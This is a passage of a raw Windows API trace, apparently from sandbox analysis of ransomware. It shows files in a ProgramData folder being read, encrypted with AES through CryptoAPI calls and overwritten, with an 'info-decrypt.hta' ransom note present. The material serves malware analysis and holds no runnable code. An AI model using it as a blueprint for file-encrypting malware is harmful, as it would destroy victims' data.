dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xbdf618) returned 1 [0149.083] CryptGenRandom (in: hProv=0xbdf618, dwLen=0x10, pbBuffer=0x375b5f8 | out: pbBuffer=0x375b5f8) returned 1 [0150.226] CryptImportKey (in: hProv=0xbdf618, pbData=0x38dfaac, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f490) returned 1 [0150.226] CryptContextAddRef (hProv=0xbdf618, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.227] CryptContextAddRef (hProv=0xbdf618, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.227] CryptDuplicateKey (in: hKey=0xb7f490, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7fad0) returned 1 [0150.227] CryptContextAddRef (hProv=0xbdf618, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.227] CryptSetKeyParam (hKey=0xb7fad0, dwParam=0x4, pbData=0x38dfb8c*=0x1, dwFlags=0x0) returned 1 [0150.227] CryptSetKeyParam (hKey=0xb7fad0, dwParam=0x1, pbData=0x38dfb58, dwFlags=0x0) returned 1 [0150.227] CryptEncrypt (in: hKey=0xb7fad0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x47587e8*, pdwDataLen=0x691f268*=0x1fae0, dwBufLen=0x1fae0 | out: pbData=0x47587e8*, pdwDataLen=0x691f268*=0x1fae0) returned 1 [0150.229] CryptEncrypt (in: hKey=0xb7fad0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x38dfbb4*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x38dfbb4*, pdwDataLen=0x691f270*=0x10) returned 1 [0150.231] CryptDestroyKey (hKey=0xb7f490) returned 1 [0150.231] CryptReleaseContext (hProv=0xbdf618, dwFlags=0x0) returned 1 [0150.231] CryptReleaseContext (hProv=0xbdf618, dwFlags=0x0) returned 1 [0150.231] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", lpFilePart=0x0) returned 0x62 [0150.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0150.231] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0150.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0150.233] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", lpFilePart=0x0) returned 0x60 [0150.233] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta", lpFilePart=0x0) returned 0x64 [0150.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0150.233] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1623fa60, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1623fa60, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x169fc1e0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0150.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0150.234] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", lpFilePart=0x0) returned 0x60 [0150.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0150.234] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), fInfoLevelId=0x0, lpFileInformation=0x38e0b94 | out: lpFileInformation=0x38e0b94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2feb941, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2feb941, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x769)) returned 1 [0150.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0150.234] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", lpFilePart=0x0) returned 0x60 [0150.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0150.234] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0150.234] GetFileType (hFile=0x2f0) returned 0x1 [0150.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0150.234] GetFileType (hFile=0x2f0) returned 0x1 [0150.235] GetFileSize (in: hFile=0x2f0, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0x769 [0150.235] ReadFile (in: hFile=0x2f0, lpBuffer=0x38e158c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x38e158c*, lpNumberOfBytesRead=0x691f29c*=0x769, lpOverlapped=0x0) returned 1 [0150.609] CloseHandle (hObject=0x2f0) returned 1 [0150.609] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xb1ee18) returned 1 [0150.611] CryptGenRandom (in: hProv=0xb1ee18, dwLen=0x10, pbBuffer=0x38e28e0 | out: pbBuffer=0x38e28e0) returned 1 [0151.152] CryptImportKey (in: hProv=0xb1ee18, pbData=0x3a08dcc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7fa10) returned 1 [0151.152] CryptContextAddRef (hProv=0xb1ee18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.152] CryptContextAddRef (hProv=0xb1ee18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.152] CryptDuplicateKey (in: hKey=0xb7fa10, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7fd50) returned 1 [0151.152] CryptContextAddRef (hProv=0xb1ee18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.152] CryptSetKeyParam (hKey=0xb7fd50, dwParam=0x4, pbData=0x3a08eac*=0x1, dwFlags=0x0) returned 1 [0151.152] CryptSetKeyParam (hKey=0xb7fd50, dwParam=0x1, pbData=0x3a08e78, dwFlags=0x0) returned 1 [0151.153] CryptEncrypt (in: hKey=0xb7fd50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a08ebc*, pdwDataLen=0x691f268*=0x770, dwBufLen=0x770 | out: pbData=0x3a08ebc*, pdwDataLen=0x691f268*=0x770) returned 1 [0151.153] CryptEncrypt (in: hKey=0xb7fd50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3a09650*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x3a09650*, pdwDataLen=0x691f270*=0x10) returned 1 [0151.201] CryptDestroyKey (hKey=0xb7fa10) returned 1 [0151.202] CryptReleaseContext (hProv=0xb1ee18, dwFlags=0x0) returned 1 [0151.202] CryptReleaseContext (hProv=0xb1ee18, dwFlags=0x0) returned 1 [0151.202] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", lpFilePart=0x0) returned 0x60 [0151.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0151.202] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0151.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0151.204] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", lpFilePart=0x0) returned 0x61 [0151.204] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta", lpFilePart=0x0) returned 0x64 [0151.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0151.204] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1623fa60, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1623fa60, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x169fc1e0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0151.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0151.204] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", lpFilePart=0x0) returned 0x61 [0151.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0151.204] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), fInfoLevelId=0x0, lpFileInformation=0x3a37644 | out: lpFileInformation=0x3a37644*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3011a9e, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd3011a9e, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1)) returned 1 [0151.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0151.204] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", lpFilePart=0x0) returned 0x61 [0151.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0151.205] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0151.205] GetFileType (hFile=0x2f0) returned 0x1 [0151.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0151.205] GetFileType (hFile=0x2f0) returned 0x1 [0151.205] GetFileSize (in: hFile=0x2f0, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0x70c1 [0151.205] ReadFile (in: hFile=0x2f0, lpBuffer=0x3a378c4, nNumberOfBytesToRead=0x70c1, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x3a378c4*, lpNumberOfBytesRead=0x691f29c*=0x70c1, lpOverlapped=0x0) returned 1 [0151.207] CloseHandle (hObject=0x2f0) returned 1 [0151.207] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xbdf260) returned 1 [0151.208] CryptGenRandom (in: hProv=0xbdf260, dwLen=0x10, pbBuffer=0x3a3ecdc | out: pbBuffer=0x3a3ecdc) returned 1 [0153.245] CryptImportKey (in: hProv=0xbdf260, pbData=0x370fd18, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xbe15e8) returned 1 [0153.245] CryptContextAddRef (hProv=0xbdf260, pdwReserved=0x0, dwFlags=0x0) returned 1 [0153.245] CryptContextAddRef (hProv=0xbdf260, pdwReserved=0x0, dwFlags=0x0) returned 1 [0153.245] CryptDuplicateKey (in: hKey=0xbe15e8, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xbe16a8) returned 1 [0153.245] CryptContextAddRef (hProv=0xbdf260, pdwReserved=0x0, dwFlags=0x0) returned 1 [0153.245] CryptSetKeyParam (hKey=0xbe16a8, dwParam=0x4, pbData=0x370fdf8*=0x1, dwFlags=0x0) returned 1 [0153.245] CryptSetKeyParam (hKey=0xbe16a8, dwParam=0x1, pbData=0x370fdc4, dwFlags=0x0) returned 1 [0153.246] CryptEncrypt (in: hKey=0xbe16a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x370fe08*, pdwDataLen=0x691f268*=0x70d0, dwBufLen=0x70d0 | out: pbData=0x370fe08*, pdwDataLen=0x691f268*=0x70d0) returned 1 [0153.246] CryptEncrypt (in: hKey=0xbe16a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3716efc*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x3716efc*, pdwDataLen=0x691f270*=0x10) returned 1 [0153.248] CryptDestroyKey (hKey=0xbe15e8) returned 1 [0153.248] CryptReleaseContext (hProv=0xbdf260, dwFlags=0x0) returned 1 [0153.248] CryptReleaseContext (hProv=0xbdf260, dwFlags=0x0) returned 1 [0153.248] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", lpFilePart=0x0) returned 0x61 [0153.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0153.248] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0153.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0153.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0153.250] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task", lpFilePart=0x0) returned 0x2a [0153.250] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\", lpFilePart=0x0) returned 0x2b [0153.250] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.251] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.251] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1 [0153.251] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1 [0153.252] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 0 [0153.252] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0153.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0153.252] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0153.252] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task", lpFilePart=0x0) returned 0x2a [0153.252] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\", lpFilePart=0x0) returned 0x2b [0153.252] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.252] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.253] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1 [0153.253] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1 [0153.253] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.253] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0153.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0153.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0153.253] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpFilePart=0x0) returned 0x51 [0153.254] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpFilePart=0x0) returned 0x52 [0153.254] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) 